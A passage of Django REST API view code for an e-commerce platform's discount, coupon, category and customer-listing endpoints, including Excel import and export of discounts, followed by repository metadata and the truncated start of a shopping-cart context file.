page = self.paginate_queryset(result)
#####################Query Generation#################################
#####################Layout#################################
if page is not None:
serializer_product = CustomerSerializer(page, many=True)
module='Customers'
screen_name='list'
layout_fetch=EngageboostGridLayouts.objects.using(company_db).get(module=module,screen_name=screen_name)
layout_header=layout_fetch.header_name.split("@@")
layout_field=layout_fetch.field_name.split("@@")
layout_check=EngageboostGridColumnLayouts.objects.using(company_db).filter(module=module,screen_name=screen_name).count()
layout={}
layout_arr=[]
for header,field in zip(layout_header,layout_field):
ex_layout_field=field.split(".")
field_name=ex_layout_field[0]
if len(ex_layout_field)>1:
child_name=ex_layout_field[1]
else:
child_name=''
if(layout_check):
layout_column_fetch=EngageboostGridColumnLayouts.objects.using(company_db).get(module=module,screen_name=screen_name)
layout_column_header=layout_column_fetch.header_name
layout_column_field=layout_column_fetch.field_name
if header in layout_column_header:
status=1
else:
status=0
else:
status=1
layout={"title":header,"field":field_name,"child":child_name,"show":status}
layout_arr.append(layout)
#####################Layout#################################
pre_data={}
final_data=[]
pre_data['result']=serializer_product.data
pre_data['layout']=layout_arr
pre_data['discount']=serializer.data
final_data.append(pre_data)
return self.get_paginated_response(final_data)
# Fetch All Category Record for page load web services
class CategoryLoed(APIView):
def get(self, request, format=None):
company_db = loginview.db_active_connection(request)
Categories = EngageboostCategoryMasters.objects.using(company_db).all().filter(isdeleted='n',isblocked='n',parent_id=0).order_by('-id')
Category = CategoriesSerializer(Categories, many=True)
if(Category):
data ={
'status':1,
'category':Category.data,
}
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
# select chield category for parent category
class Getchild_category(APIView):
def post(self, request, format=None):
company_db = loginview.db_active_connection(request)
category_id=request.data['category_id']
Categories = EngageboostCategoryMasters.objects.using(company_db).all().filter(parent_id=category_id)
arr2=[]
for Categories1 in Categories:
d2={"id":Categories1.id,"name":Categories1.name}
arr2.append(d2)
return HttpResponse(json.dumps({"category":arr2,"status":1}), content_type='application/json')
class ProductLoad(generics.ListAPIView):
# """ List all products from web services """
def post(self, request, format=None,many=True):
company_db = loginview.db_active_connection(request)
#####################Query Generation#################################
if request.data['search']:
key=request.data['search']
order_type=request.data['order_type']
order_by=request.data['order_by']
if(order_type=='+'):
order=order_by
elif(order_type=='-'):
order='-'+order_by
cnt = EngageboostProducts.objects.using(company_db).filter(Q(name__icontains=key)|Q(sku__icontains=key)|Q(default_price__icontains=key)).filter(isblocked='n',isdeleted='n').count()
if cnt !=0:
result = EngageboostProducts.objects.using(company_db).all().order_by(order).filter(Q(name__icontains=key)|Q(sku__icontains=key)|Q(default_price__icontains=key)).filter(isblocked='n',isdeleted='n')[:100]
arr=[]
for product in result:
data ={
'id':product.id,
'name':product.name,
'sku':product.sku,
'default_price':product.default_price
}
arr.append(data)
data2 ={
'product':arr
}
return Response(data2)
else:
data2 ={
'product':''
}
return Response(data2)
else:
order_type=request.data['order_type']
order_by=request.data['order_by']
if(order_type=='+'):
order=order_by
elif(order_type=='-'):
order='-'+order_by
result = EngageboostProducts.objects.using(company_db).all().order_by(order).filter(isblocked='n',isdeleted='n')[:100]
arr=[]
for product in result:
data ={
'id':product.id,
'name':product.name,
'sku':product.sku,
'default_price':product.default_price
}
arr.append(data)
data2 ={
'product':arr
}
return Response(data2)
class ProductLoadPaging(generics.ListAPIView):
# """ List all products from web services """
def post(self, request, format=None,many=True):
company_db = loginview.db_active_connection(request)
#####################Query Generation#################################
#print('Chkardahr Sahoo')
key = ''
if request.data['search']:
key = request.data['search']
order_type = request.data['order_type']
order_by = request.data['order_by']
product_id = request.data['product_id']
if(order_type=='+'):
order = order_by
elif(order_type=='-'):
order = '-'+order_by
parentProduct = EngageboostCossSellProducts.objects.values('product_id').filter(~Q(product_id=product_id))
# print("Parents",parentProduct)
ownchildProduct = EngageboostCossSellProducts.objects.values('cross_product_id').filter(~Q(product_id=product_id))
# print("Childs",ownchildProduct,ownchildProduct.query)
proObj = EngageboostProducts.objects.using(company_db).filter(isblocked='n',isdeleted='n').filter(~Q(id=product_id)).values('id')
product_ids = []
if proObj.count()>0:
result = proObj.all()
for item in result:
check = EngageboostCossSellProducts.objects.filter(Q(product_id=item['id'])|Q(cross_product_id=item['id'])).filter(~Q(product_id=product_id))
if check.count()==0:
product_ids.append(item['id'])
proObj = EngageboostProducts.objects.using(company_db).filter(id__in=product_ids)
catProduct = EngageboostProductCategories.objects.filter(isblocked='n',isdeleted='n',product_id=product_id).last()
sameCatProduct = EngageboostProductCategories.objects.filter(isblocked='n',isdeleted='n',category_id=catProduct.category_id).values('product_id')
proObj = proObj.filter(id__in=sameCatProduct)
if key != '':
proObj = proObj.filter(Q(name__icontains=key)|Q(sku__icontains=key)|Q(default_price__icontains=key))
# print(proObj.query)
cnt = proObj.count()
if cnt !=0:
result = proObj.all().order_by(order)[:100]
page = self.paginate_queryset(result)
arr=[]
if page is not None:
serializer_product = EngageboostProductsSerializer(page, many=True)
serializer_product = serializer_product.data
for product in serializer_product:
data ={
'id':product['id'],
'name':product['name'],
'sku':product['sku'],
'default_price':product['default_price']
}
arr.append(data)
return self.get_paginated_response(arr)
else:
data2 = {
"result":[]
}
return Response(data2)
# Customer group web services for Discount Setup Load
class CustomerLoed(APIView):
def get(self, request, format=None):
company_db = loginview.db_active_connection(request)
customergrp = EngageboostCustomerGroup.objects.using(company_db).all().filter(isdeleted='n',
isblocked='n').order_by('name')
customer = CustomerGroupSerializer(customergrp, many=True)
if(customer):
data ={
'status':1,
'customer':customer.data,
}
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
class CustomerType(generics.ListAPIView):
# """ List all products from web services """
def post(self, request, format=None,many=True):
company_db = loginview.db_active_connection(request)
#####################Query Generation#################################
if request.data['search']:
key=request.data['search']
order_type=request.data['order_type']
order_by=request.data['order_by']
if(order_type=='+'):
order=order_by
elif(order_type=='-'):
order='-'+order_by
cnt = EngageboostCustomerGroup.objects.using(company_db).filter(Q(name__icontains=key)).filter(isblocked='n',isdeleted='n').count()
if cnt !=0:
result = EngageboostCustomerGroup.objects.using(company_db).all().order_by(order).filter(Q(name__icontains=key)).filter(isblocked='n',isdeleted='n')[:100]
arr=[]
for customergrp in result:
data ={
'id':customergrp.id,
'name':customergrp.name
}
arr.append(data)
data2 ={
'customergrp':arr
}
return Response(data2)
else:
data2 ={
'customergrp':''
}
return Response(data2)
else:
order_type=request.data['order_type']
order_by=request.data['order_by']
if(order_type=='+'):
order=order_by
elif(order_type=='-'):
order='-'+order_by
result = EngageboostCustomerGroup.objects.using(company_db).all().order_by(order).filter(isblocked='n',isdeleted='n')[:100]
arr=[]
for customergrp in result:
data ={
'id':customergrp.id,
'name':customergrp.name
}
arr.append(data)
data2 ={
'customergrp':arr
}
return Response(data2)
class DiscountCustomer(generics.ListAPIView):
# """ List all products from web services """
def post(self, request, format=None,many=True):
company_db = loginview.db_active_connection(request)
#####################Query Generation#################################
if request.data['search']:
key=request.data['search']
order_type=request.data['order_type']
order_by=request.data['order_by']
if(order_type=='+'):
order=order_by
elif(order_type=='-'):
order='-'+order_by
cnt = EngageboostCustomers.objects.using(company_db).filter(Q(first_name__icontains=key)|Q(email__icontains=key)).filter(isblocked='n',isdeleted='n').count()
if cnt !=0:
result = EngageboostCustomers.objects.using(company_db).all().order_by(order).filter(Q(first_name__icontains=key)|Q(email__icontains=key)).filter(isblocked='n',isdeleted='n')[:100]
arr=[]
for customer in result:
data ={
'id':customer.id,
'first_name':customer.first_name,
'last_name':customer.last_name,
'email':customer.email
}
arr.append(data)
data2 ={
'customer':arr
}
return Response(data2)
else:
data2 ={
'customer':''
}
return Response(data2)
else:
order_type=request.data['order_type']
order_by=request.data['order_by']
if(order_type=='+'):
order=order_by
elif(order_type=='-'):
order='-'+order_by
result = EngageboostCustomers.objects.using(company_db).all().order_by(order).filter(isblocked='n',isdeleted='n')[:100]
arr=[]
for customer in result:
data ={
'id':customer.id,
'first_name':customer.first_name,
'last_name':customer.last_name,
'email':customer.email
}
arr.append(data)
data2 ={
'customer':arr
}
return Response(data2)
class CategoriesListDiscount(generics.ListAPIView):
# """ Categories Selected """
#///////////////////Fetch Single Row
def get(self, request, pk, format=None):
company_db = loginview.db_active_connection(request)
Categories = EngageboostCategoryMasters.objects.using(company_db).all().filter(isdeleted='n',isblocked='n',parent_id=0).order_by('-id')
Category = CategoriesSerializer(Categories, many=True)
child_id=EngageboostDiscountMastersConditions.objects.using(company_db).get(id=pk)
if str(child_id.all_category_id)!='None':
all_categories=child_id.all_category_id.split(',')
all_categories = [int(numeric_string) for numeric_string in all_categories]
all_categories.sort()
arr2=[]
for child in all_categories:
child_id1 = EngageboostCategoryMasters.objects.using(company_db).filter(id=child,isdeleted='n',isblocked='n')
if child_id1.count() > 0:
child_id1 = child_id1.first()
if child_id1.parent_id != 0:
child_count1=EngageboostCategoryMasters.objects.using(company_db).filter(id=child_id1.parent_id,isdeleted='n',isblocked='n').count()
if child_count1 > 0:
child_id2=EngageboostCategoryMasters.objects.using(company_db).get(id=child_id1.parent_id,isdeleted='n',isblocked='n')
if child_id2.parent_id!=0:
child_count2=EngageboostCategoryMasters.objects.using(company_db).filter(id=child_id2.parent_id,isdeleted='n',isblocked='n').count()
if child_count2 >0:
child_id3=EngageboostCategoryMasters.objects.using(company_db).get(id=child_id2.parent_id,isdeleted='n',isblocked='n')
if child_id3.parent_id!=0:
child_count2=EngageboostCategoryMasters.objects.using(company_db).filter(id=child_id3.parent_id,isdeleted='n',isblocked='n').count()
if child_count2 >0:
child_id4=EngageboostCategoryMasters.objects.using(company_db).get(id=child_id3.parent_id,isdeleted='n',isblocked='n')
category_1=child_id4.id
category_2=child_id3.id
category_3=child_id2.id
category_4=child_id1.id
else:
category_1=child_id3.id
category_2=child_id2.id
category_3=child_id1.id
category_4=0
else:
category_1=child_id2.id
category_2=child_id1.id
category_3=0
category_4=0
else:
category_1=child_id1.id
category_2=0
category_3=0
category_4=0
data_parent={"category_1":category_1,"category_2":category_2,"category_3":category_3,"category_4":category_4}
arr2.append(data_parent)
return HttpResponse(json.dumps({"parent_child":arr2,'category':Category.data}), content_type='application/json')
else:
data_parent=[{"category_1":0,"category_2":0,"category_3":0,"category_4":0}]
return HttpResponse(json.dumps({"parent_child":data_parent,'category':Category.data}), content_type='application/json')
class CatrgoryConditionsSet(generics.ListAPIView):
# Category all for discount coupan
def get(self, request, format=None,many=True):
company_db = loginview.db_active_connection(request)
Categories = EngageboostCategoryMasters.objects.using(company_db).all().filter(isdeleted='n',isblocked='n')
Category = CategoriesSerializer(Categories, many=True)
if(Category):
data ={
'category':Category.data,
}
else:
data ={
'status':0,
'api_status':serializer.errors,
'message':'Data Not Found',
}
return Response(data)
class ImportFileDiscounts(generics.ListAPIView):
def post(self, request, format=None):
company_db = loginview.db_active_connection(request)
datas = []
db_fields = []
product_path = 'discounts'
module_id = 1
temp_model = 'TempDiscount'
model = 'Discount'
filepath = 'importfile'
post_data = request.data
if 'import_file' in request.FILES:
rand = str(random.randint(1,99999))
file1 = request.FILES['import_file']
file_name=file1.name
ext = file_name.split('.')[-1]
time_stamp = str(int(datetime.datetime.now().timestamp()))
new_file_name='DiscountImport_'+rand+time_stamp
fs=FileSystemStorage()
filename = fs.save(filepath+'/'+product_path+'/'+new_file_name+'.'+ext, file1)
uploaded_file_url = fs.url(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
csvReader = xlrd.open_workbook(settings.BASE_DIR+uploaded_file_url)
sheet = csvReader.sheet_by_name('Sheet1')
headers = [str(cell.value) for cell in sheet.row(0)]
headers = {k: k for k in headers}
#********* List Of Parent Category *********#
category_lists = []
category_cond = EngageboostCategoryMasters.objects.using(company_db).all().filter(website_id=post_data['website_id'],parent_id=0,isblocked="n",isdeleted="n").order_by('name')
if category_cond:
category_list = CategoriesSerializer(category_cond,many=True)
category_lists = category_list.data
else:
category_lists = []
datas = {"category_list":category_lists,"filename":new_file_name+'.'+ext,"xls_header":headers}
return Response(datas)
class SaveFileDiscounts(generics.ListAPIView):
def post(self, request, format=None):
company_db = loginview.db_active_connection(request)
product_path = 'discounts'
module_id = 1
temp_model = 'TempDiscount'
model = 'Discount'
filepath = 'importfile'
datas = []
custom_field_datas=[]
post_data = request.data
# map_fields = post_data["map_fields"]
# Read xls Data
fs=FileSystemStorage()
filename = filepath+'/'+product_path+'/'+post_data["filename"]
uploaded_file_url = fs.url(filename)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
if os.path.exists(BASE_DIR):
csvReader = xlrd.open_workbook(settings.BASE_DIR+uploaded_file_url)
sheet = csvReader.sheet_by_index(0)
length=len(sheet.col_values(0))
xls_column_header_info = []
xls_column_info={}
row_no_in_xls= sheet.ncols
# max_column = sheet.ncols
for x in range(length):
if x==0:
for i in range(row_no_in_xls):
d11 ={"column_name":sheet.col_values(i)[x],"column_number":i}; xls_column_info=dict(xls_column_info,**d11)
xls_column_header_info.append(xls_column_info)
else:
pass
for x in range(length):
if x==0:
pass
else:
has_record = EngageboostTempDiscountMasters.objects.last()
if has_record:
last_entry_of_table = EngageboostTempDiscountMasters.objects.order_by('-id').latest('id')
row_id = int(last_entry_of_table.id)+int(1)
else:
row_id = 1
serializer_data={}
CF_serializer_data={}
custom_field_list=[]
d2 = {}
d1 = {"id":row_id,"website_id":post_data['website_id'],"file_name":post_data['filename']};
serializer_data=dict(serializer_data,**d1)
try:
for xls_column_header in xls_column_header_info:
coupon_type = ""
disc_type = ""
column_name = str(xls_column_header["column_name"])
column_name = column_name.strip()
column_number = xls_column_header["column_number"]
field_value = sheet.col_values(column_number)[x] if sheet.col_values(column_number)[x] else None
if column_name=="Discount Name":
keyword = "name"
if column_name=="Discount Description":
keyword = "description"
if column_name=="Discount Type":
keyword = "discount_type"
if column_name=="Apply Per/Fixed":
keyword = "disc_type"
disc_type = field_value
if column_name=="Coupon Code":
keyword = "coupon_code"
if column_name=="Coupon Type":
keyword = "coupon_type"
if column_name=="Generate Options":
keyword = "has_multiplecoupons"
if column_name=="Number of Coupons":
keyword = "used_coupon"
if column_name=="Coupon Prefix":
keyword = "coupon_prefix"
if column_name=="Coupon Suffix":
keyword = "coupon_suffix"
if column_name=="Discount Amount":
keyword = "amount"
if column_name=="Discount Starts":
keyword = "disc_start_date"
if column_name=="Discount End":
keyword = "disc_end_date"
if column_name=="Max. no of items":
keyword = "no_of_quantity_per"
if column_name=="Max Discount Amount":
keyword = "up_to_discount"
if column_name=="Offer Type":
keyword = "offer_type"
if column_name=="Customer Group":
keyword = "customer_group"
if column_name=="Status":
keyword = "isblocked"
if column_name=="SKU Equals To":
keyword = "sku_equals"
if column_name=="SKU Not Equals To":
keyword = "sku_not_equals"
if column_name=="Category Equals To":
keyword = "category_equals"
if column_name=="Category Not Equals To":
keyword = "category_not_equals"
if column_name=="Amount Equals To":
keyword = "amount_equals"
if column_name=="Amount Equals To>":
keyword = "amount_equals_greater"
if column_name=="Amount Equals To<":
keyword = "amount_equals_less"
if column_name=="Free Item sku":
keyword = "free_item_sku"
if column_name=="Free item Quantity":
keyword = "free_item_quantity"
if column_name=="Weekly Equals To":
keyword = "weekly_equals"
if column_name=="Weekly Not Equals To":
keyword = "weekly_not_equals"
if column_name=="Customer Equals To":
keyword = "customer_equals"
if column_name=="Customer Not Equals To":
keyword = "customer_not_equals"
if column_name=="Free Shipping":
keyword = "free_shipping"
d2.update({keyword:field_value})
if d2['discount_type'].lower()=="product" and d2['disc_type'].lower()=="p":
d2.update({"disc_type":1})
elif d2['discount_type'].lower()=="product" and d2['disc_type'].lower()=="f":
d2.update({"disc_type":2})
elif d2['discount_type'].lower()=="product" and d2['disc_type'].lower()=="p":
d2.update({"disc_type":4})
elif d2['discount_type'].lower()=="coupon" and d2['disc_type'].lower()=="p":
d2.update({"disc_type":6})
elif d2['discount_type'].lower()=="coupon" and d2['disc_type'].lower()=="f":
d2.update({"disc_type":3})
elif d2['discount_type'].lower()=="coupon" and d2['disc_type'].lower()=="fh":
d2.update({"disc_type":7})
if d2['discount_type'].lower()=="product":
d2.update({"discount_type":"p"})
elif d2['discount_type'].lower()=="coupon":
d2.update({"discount_type":"c"})
if d2['discount_type'].lower()=="coupon" and d2['coupon_type'].lower()=='single use':
d2.update({"coupon_type":1})
elif d2['discount_type'].lower()=="coupon" and d2['coupon_type'].lower()=='multiple use':
d2.update({"coupon_type":2})
if d2['has_multiplecoupons'].lower()=="single code":
d2.update({"has_multiplecoupons":'n'})
elif d2['has_multiplecoupons'].lower()=="multiple code":
d2.update({"has_multiplecoupons":'y'})
if d2['coupon_type'].lower()=="single use":
d2.update({"coupon_type":1})
elif d2['coupon_type'].lower()=="multiple use":
d2.update({"coupon_type":2})
if d2['isblocked'].lower()=="active":
d2.update({"isblocked":'n'})
elif d2['isblocked'].lower()=="inactive":
d2.update({"isblocked":'y'})
if d2['customer_group']!="" and d2['customer_group']!=None:
obj = EngageboostCustomerGroup.objects.filter(name=d2['customer_group'])
if obj.count()>0:
custgrp=obj.last()
d2.update({"customer_group":custgrp.id})
else:
d2.update({"customer_group":None})
workbook_datemode = csvReader.datemode
y, M, d, h, m, s = xlrd.xldate_as_tuple(d2['disc_start_date'], workbook_datemode)
d2['disc_start_date'] = ("{0}-{1}-{2}".format(y, M, d, h, m, s))
y, M, d, h, m, s = xlrd.xldate_as_tuple(d2['disc_end_date'], workbook_datemode)
d2['disc_end_date'] = ("{0}-{1}-{2}".format(y, M, d, h, m, s))
d2['disc_start_date'] = datetime.datetime.strptime(d2['disc_start_date'],'%Y-%m-%d').strftime('%Y-%m-%dT%H:%M:%SZ')
d2['disc_end_date'] = datetime.datetime.strptime(d2['disc_end_date'],'%Y-%m-%d').strftime('%Y-%m-%dT%H:%M:%SZ')
serializer_data=dict(serializer_data,**d2)
except KeyError: no=""
current_time = datetime.datetime.now(datetime.timezone.utc).astimezone()
d1={"created":current_time,"modified":current_time};
serializer_data=dict(serializer_data,**d1)
try:
save_temp_product = EngageboostTempDiscountMasters.objects.using(company_db).create(**serializer_data)
data_status = {"status":1,"filename":post_data["filename"]}
except Exception as e :
data_status = {"status":0,"filename":post_data["filename"],'errors':str(e) }
os.remove(settings.BASE_DIR+uploaded_file_url)
else:
data_status = {"status":0,"filename":post_data["filename"],'errors':"File Not Exists" }
return Response(data_status)
class PreviewSaveFileDiscounts(generics.ListAPIView):
def post(self, request, format=None):
company_db = loginview.db_active_connection(request)
post_data = request.data
fetch_all_data = []
data = {}
if post_data["model"] == "discount":
fetch_all_data_cond = EngageboostTempDiscountMasters.objects.using(company_db).all().filter(website_id=post_data['website_id'],file_name=post_data['filename']) #fetch from temp product table
if fetch_all_data_cond:
fetch_all_datas = TempDiscountsSerializer(fetch_all_data_cond,many=True)
# fetch_all_data = fetch_all_datas.data
for fad in fetch_all_datas.data:
#print(check_exported_data(fad,request))
error=[]
special_char='no'
if error:
fad["error"] = 1
fad["error_message"] = error
else:
error.append("SUCCESS")
fad["error"] = 0
fad["error_message"] = error
fetch_all_data = fetch_all_datas.data
data = {"preview_data":fetch_all_data,"filename":post_data['filename']}
return Response(data)
class SaveAllImportedDiscounts(generics.ListAPIView):
def post(self, request, format=None):
company_db = loginview.db_active_connection(request)
product_path = 'discount'
module_id = 1
temp_model = 'TempDiscount'
model = 'Discount'
datas = []
fetch_temp_datas = []
# map_field_dict="";map_field_array=[]
post_data = request.data
selectedIds = post_data["selected_ids"].split(',')
for i in selectedIds:
fetch_temp_data_cond = EngageboostTempDiscountMasters.objects.using(company_db).filter(id=int(i)).first()
if fetch_temp_data_cond:
fetch_temp_data = TempDiscountsSerializer(fetch_temp_data_cond,partial=True)
fetch_temp_datas.append(fetch_temp_data.data)
for fetchtempdatas in fetch_temp_datas:
serializer_data = {}
serializer_data = dict(serializer_data,**fetchtempdatas)
if fetchtempdatas['discount_type']=="c":
discount_master_type = 1
elif fetchtempdatas['discount_type']=="p":
discount_master_type = 0
current_time = datetime.datetime.now(datetime.timezone.utc).astimezone()
d1 = {"discount_master_type":discount_master_type,"website_id":fetchtempdatas["website_id"],"created":current_time,"modified":current_time}
serializer_data = dict(serializer_data,**d1)
datas.append(serializer_data)
serializer = DiscountMasterSerializer(data=serializer_data,partial=True)
if serializer.is_valid():
serializer.save()
responseDatas = {"status":1,"api_response":datas,"message":'Discounts Saved'}
else:
data ={'status':0,'api_status':serializer.errors,'message':'Error Occured'}
datas.append(data)
responseDatas = {"status":0,"api_response":datas,"message":'Error Occured in Discounts'}
EngageboostTempDiscountMasters.objects.using(company_db).filter(file_name=post_data['filename']).delete()
return Response(responseDatas)
# Set discount condition(Insert new records)
class DiscountCouponCondition(generics.ListAPIView):
def post(self, request, format=None):
datas=[]
company_db = loginview.db_active_connection(request)
discount_master_id=request.data['discount_master_id']
disc_cnt=EngageboostDiscountMasters.objects.using(company_db).filter(id=discount_master_id,discount_type="c").count()
if disc_cnt>0:
cnt=EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).count()
if cnt >0:
EngageboostDiscountMastersConditions.objects.using(company_db).filter(discount_master_id=discount_master_id).delete()
has_multy=request.data['value']
error = []
datas = []
for data in has_multy:
# serializer_data = dict()
if data['fields']=="-1"or data['fields']=="-4" or data['fields']=="-2" or data['fields']=="-3" or data['fields']=="9175" or data['fields']=="0":
has_record = EngageboostDiscountMastersConditions.objects.using(company_db).last()
if has_record:
last_entry_of_table = EngageboostDiscountMastersConditions.objects.order_by('-id').latest('id')
row_id = int(last_entry_of_table.id)+int(1)
else:
row_id = 1
d1={"id":row_id};
#Customer
if data['fields']=="-2":
if not 'all_customer_id' in data or data['all_customer_id']=="" or data['all_customer_id']==None:
data.update({"error":"Select customers"})
error.append(data)
#Week Days
elif data['fields']=="-3":
if not 'all_day_id' in data or data['all_day_id']=="" or data['all_day_id']==None:
data.update({"error":"Select Days"})
error.append(data)
#Free Shipping or Order Amount
elif data['fields']=="-4" or data['fields']=="-1":
if not 'value' in data or data['value']=="" or data['value']==None:
data.update({"error":"Enter value"})
error.append(data)
#SKU
elif data['fields']=="9175":
if not 'all_product_id' in data or data['all_product_id']=="" or data['all_product_id']==None:
data.update({"error":"Select Products"})
error.append(data)
#Category
elif data['fields']=="0":
if not 'all_category_id' in data or data['all_category_id']=="" or data['all_category_id']==None:
data.update({"error":"Select Categories"})
error.append(data)
data=dict(data,**d1)
now = datetime.datetime.now()
current_time = now.strftime("%Y-%m-%d")
d3 = {"created":current_time,"modified":current_time}
data=dict(data,**d3)
# datas.append(data)
serializer = DiscountConditionsSerializer(data=data,partial=True)
if serializer.is_valid():
serializer.save()
else:
data.update({"error":serializer.errors})
error.append(data)
else:
data.update({"error":"Invalid discount type"})
error.append(data)
else:
error.append("Invalid discount")
if len(error)>0:
context ={
'status':0,
'api_status':serializer.errors,
'message':'Something went wrong',
}
else:
context ={
'status':1,
'api_status':'',
'message':'Successfully Inserted',
}
return Response(context)
# return Response(datas)
# Set discount condition(Insert new records)
class DiscountProductFree(generics.ListAPIView):
def post(self, request, format=None):
data=request.data
company_db = loginview.db_active_connection(request)
now = datetime.datetime.now()
current_time = datetime.datetime.now(datetime.timezone.utc).astimezone()
d3 = {"created":current_time,"modified":current_time}
data = dict(data,**d3)
#print(data)
serializer = DiscountMasterSerializer(data=data,partial=True)
if serializer.is_valid():
prev_products = list(EngageboostDiscountMastersConditions.objects.filter(discount_master_id = serializer.id).values_list('all_product_id',flat=True))
serializer.save()
# if(serializer.id):
# objproduct_list = EngageboostDiscountMastersConditions.objects.filter(discount_master_id = serializer.id).values_list('all_product_id',flat=True)
# if(prev_products):
# objproduct_list = list(objproduct_list)
# objproduct_list.extend(prev_products)
# objproduct_list = list(set(objproduct_list))
# if objproduct_list :
# for elastic_product_id in objproduct_list:
# if(elastic_product_id!=""):
# if("," in elastic_product_id):
# prod_lst = elastic_product_id.split(",")
# for prod_id in prod_lst:
# if(prod_id!=""):
# elastic = common.save_data_to_elastic(int(prod_id),'EngageboostProducts')
# else:
# elastic = common.save_data_to_elastic(int(elastic_product_id),'EngageboostProducts')
if(serializer.id):
objproduct_list = EngageboostDiscountMastersConditions.objects.filter(discount_master_id = serializer.id).values_list('all_product_id',flat=True)
if(prev_products):
objproduct_list = list(objproduct_list)
objproduct_list.extend(prev_products)
objproduct_list = list(set(objproduct_list))
if objproduct_list :
for elastic_product_id in objproduct_list:
if(elastic_product_id != "" and elastic_product_id is not None):
try:
if("," in elastic_product_id):
prod_lst = elastic_product_id.split(",")
elastic = common.update_bulk_elastic('EngageboostProducts',prod_lst,'channel_currency_product_price','update')
else:
elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
except:
elastic = common.update_bulk_elastic('EngageboostProducts',[int(elastic_product_id)],'channel_currency_product_price','update')
context ={
'status':1,
'api_status':'',
'message':'Successfully Inserted',
}
else:
context ={
'status':0,
'api_status':serializer.errors,
'message':'Something went wrong',
}
return Response(context)
# return Response(datas)
class CouponExport(generics.ListAPIView):
def post(self, request, *args, **kwargs):
company_db = loginview.db_active_connection(request)
try:
discount_master_id=request.data['discount_master_id']
## ************ Check file dir exist or not. If dir not exist then create
file_dir = settings.MEDIA_ROOT+'/exportfile/'
export_dir = settings.MEDIA_URL+'exportfile/'
if not os.path.exists(file_dir):
os.makedirs(file_dir)
## ************ Create file name
file_name = "coupon_export_"+get_random_string(length=5)
## Create file full path
file_path = file_dir+file_name+'.xlsx'
export_file_path = export_dir+file_name+'.xlsx'
export_file_path = export_file_path[1:]
workbook = xlsxwriter.Workbook(file_path)
worksheet = workbook.add_worksheet()
bold = workbook.add_format({'bold': True})
row = 1
worksheet.write(0,0,'ID',bold)
worksheet.write(0,1,'Coupon Code',bold)
worksheet.write(0,2,'Is Used',bold)
is_used = ""
result = EngageboostDiscountMastersCoupons.objects.using(company_db).filter(isdeleted='n',discount_master_id=discount_master_id).order_by('id')
result_count = result.count()
if result_count>0:
result_data = DiscountMasterCouponSerializer(result, many=True)
result_data = result_data.data
for resultdata in result_data:
if resultdata['is_used']=="y":
is_used = "Yes"
else:
is_used = "No"
worksheet.write(row,0,resultdata['id'],0)
worksheet.write(row,1,resultdata['coupon_code'],0)
worksheet.write(row,2,is_used,0)
row = row + 1
workbook.close()
data ={'status':1,"file_path":export_file_path}
else:
data ={'status':0,"message":"No coupon found for this promotion"}
except Exception as error:
trace_back = sys.exc_info()[2]
line = trace_back.tb_lineno
data = {"status":0,"api_status":traceback.format_exc(),"error_line":line,"error_message":str(error),"message": str(error)}
return Response(data)
# @csrf_exempt
# @permission_classes((AllowAny,))
def check_exported_data(serializer_data,request):
company_db = loginview.db_active_connection(request)
d2 = {'status':'','err_flag':'','error_text':[]}
current_time = datetime.datetime.now()
serializer_data['disc_start_date'] = datetime.datetime.strptime(serializer_data['disc_start_date'],'%Y-%m-%dT%H:%M:%SZ')
serializer_data['disc_end_date'] = datetime.datetime.strptime(serializer_data['disc_end_date'],'%Y-%m-%dT%H:%M:%SZ')
coupon=EngageboostDiscountMasters.objects.using(company_db).filter(coupon_code=serializer_data['coupon_code'],isblocked="n",isdeleted="n").count()
if serializer_data['discount_type'] == 'coupon' and serializer_data['coupon_code'] == "" and serializer_data['has_multiplecoupons'] == "Single Code":
d2['error_text'].append("Coupon code is missing")
if serializer_data['discount_type'] == 'coupon' and serializer_data['has_multiplecoupons'] == "Multiple Code" and serializer_data['used_coupon'] <= 0:
d2['error_text'].append("Number of coupons should not blank")
if serializer_data['discount_type'] == 'product' and serializer_data['offer_type'] == "" :
d2['error_text'].append("Offer type should not blank")
if serializer_data['coupon_type'] == "" and serializer_data['discount_type'] == 'coupon':
d2['error_text'].append("Coupon type does not exist")
if serializer_data['name'] == "":
d2['error_text'].append("Discount name is missing")
if serializer_data['amount'] == "":
d2['error_text'].append("Discount amount should not blank")
if serializer_data['disc_start_date']=="":
d2['error_text'].append("Start date should not blank")
if serializer_data['disc_start_date']<current_time:
d2['error_text'].append("Start date should not less than current date")
if serializer_data['disc_end_date'] == "":
d2['error_text'].append("End date should not blank")
if serializer_data['disc_end_date']<current_time:
d2['error_text'].append("End date should not less than current date")
if serializer_data['disc_end_date']<=serializer_data['disc_start_date']:
d2['error_text'].append("End date should be greater than Start date")
if serializer_data['offer_type'] == "":
d2['error_text'].append("Offer type is missing")
if serializer_data['customer_group'] == "":
d2['error_text'].append("Customer group is missing")
if serializer_data['isblocked'] == "":
d2['error_text'].append("Status is missing")
if serializer_data['disc_type'] == "":
d2['error_text'].append("Apply per should not blank")
if coupon > 0:
d2['error_text'].append("Coupon code exist")
if len(d2['error_text'])>0:
d2['err_flag']= 1
else:
d2['err_flag']= 0
serializer_data=dict(serializer_data,**d2)
return serializer_data | [
"mjamal@lifcoshop.net"
] | mjamal@lifcoshop.net |
f60a796426a088065e486da9f6fc3e3d52b7acb5 | d671ae8abe44541b6942c1ddb799dc23353157c1 | /cart/contexts.py | 71b966dfc82175dea5e8642e8a74acd51f0c237f | [
"MIT"
] | permissive | Walachul/milestone4 | f3dbbca09c49feeb39dbb4a46691012eeadfaae2 | ce3be4d39b5d28141f41d4783d3e7211480ce64d | refs/heads/master | 2022-12-11T15:06:49.227485 | 2020-02-27T21:47:16 | 2020-02-27T21:47:16 | 205,703,804 | 0 | 1 | MIT | 2022-12-08T06:58:37 | 2019-09-01T16:34:58 | Python | UTF-8 | Python | false | false | 712 | py | from django.shortcuts import get_object_or_404
from products.models import Product
def cart_contents(request):
"""
Stores the cart items and keeps them in the session when the user is logged in
and he navigates the site.
Cart items are gone when the user logs out.
"""
cart = request.session.get("cart", {})
cart_items = []
total = 0
item_count = 0
for id, quantity in cart.items():
